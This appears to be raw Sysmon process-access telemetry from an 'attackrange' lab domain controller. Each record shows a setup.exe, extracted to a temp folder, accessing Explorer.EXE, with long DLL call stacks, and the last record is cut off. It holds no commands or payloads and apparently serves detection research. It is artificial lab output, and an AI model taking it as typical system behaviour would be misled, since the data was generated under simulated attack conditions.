13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\